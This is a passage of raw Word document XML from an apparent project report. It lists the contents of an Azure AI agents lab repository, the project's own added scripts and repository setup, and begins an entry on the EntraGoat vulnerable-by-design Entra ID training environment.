              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64D38C88" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Used for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="22C31F90" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 0 — AI Playground (environment setup and first agent patterns)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="4F120417" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0CB43A35" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Local path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7929AE56" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C:\Users\hdhan\Documents\GitHub\azure-ai-agents-labs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0133C119" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39838E49" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What the repository contains out of the box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F654D3" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 1 – Project Setup (.ipynb): Azure AI Foundry project creation and environment verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3320DA7A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 2 – Create an AI Agent in the AI Foundry UI (.md): low-code agent walkthrough</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6A3A2A" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 3 – Create a Simple AI Agent (.ipynb): first Python agent pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C460772" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 4 – Create a RAG Agent (.ipynb): retrieval-augmented generation over documents</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45985E01" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Lab 5 – Develop a Multi-Agent System (.ipynb): multi-agent orchestration pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015B320C" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sample.env: template for required environment variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229B9622" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>requirements.txt: pinned Python dependency list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DB4A6E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>data/ and images/ folders: lab reference assets; README.md, LICENSE, CODE_OF_CONDUCT.md, SECURITY.md, SUPPORT.md: standard repository governance files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C32628" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="419B9390" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What was used as-is: the repository was cloned as the Stage 0 starting point; sample.env served as the template for this project's own .env file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0878DCA6" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Issue encountered: requirements.txt pins old package versions (e.g. cffi==1.17.1, aiohttp==3.11.11) with no prebuilt wheels for the Python version used, causing a Microsoft Visual C++ Build Tools compile failure on install. Resolved by installing the needed packages unpinned instead (openai, python-dotenv, requests, msal, azure-identity).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB57DE9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00E276B3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>What this project added on top (not part of the original repository):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AC1090" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00E276B3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hello.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Stage 0 minimal chat completion script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340431A4" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00E276B3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>agent.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Stage 0 first tool-calling agent (get_current_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF12571" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00E276B3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>graph_client.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Stage 1/3 Microsoft Graph client and audit-check functions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013610C2" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00E276B3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>entra_agent.py</w:t>
      </w:r>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Stage 2/3 Entra-aware tool-calling agent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122D9881" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00E276B3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — populated with real Azure OpenAI and Pearson tenant credentials (excluded from version control)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A403EEA" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00E276B3" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Listenabsatz"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="90"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.gitignore</w:t>
      </w:r>
      <w:r w:rsidRPr="00E276B3">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> — updated to exclude .env and .venv/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DBA893D" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Repository handling: the clone's git origin was renamed to upstream (preserving the ability to pull future updates from Microsoft's repo), and a new origin was added pointing to the author's own private GitHub repository, so this project's own code could be tracked and pushed independently of the lab source.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482FAC85" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:spacing w:before="300" w:after="150"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc243301440"/>
      <w:r w:rsidRPr="00DC1FF9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>10.2 Semperis/EntraGoat</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="95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2400"/>
        <w:gridCol w:w="7100"/>
      </w:tblGrid>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="6B060DC5" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="67FA4F78" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Attribute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="1E3A5F"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="08C790AE" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="199EC4C8" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="624B1EFF" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="76F11425" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>github.com/Semperis/EntraGoat — Semperis' open-source, “vulnerable by design” Entra ID environment for practicing identity attack paths</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="47D2985A" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7AEFF183" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Used for</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62112C05" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Stage 4 — EntraGoat challenges</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00530310" w:rsidRPr="00DC1FF9" w14:paraId="7268AF41" w14:textId="77777777">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2400" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="752B9B0B" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Local path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7100" w:type="dxa"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="24E7F9D9" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC1FF9">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>C:\Users\hdhan\Documents\GitHub\EntraGoat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35183E02" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00530310">
      <w:pPr>
        <w:spacing w:before="160"/>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E0FB40E" w14:textId="77777777" w:rsidR="00530310" w:rsidRPr="00DC1FF9" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:rPr>
          <w:noProof/>
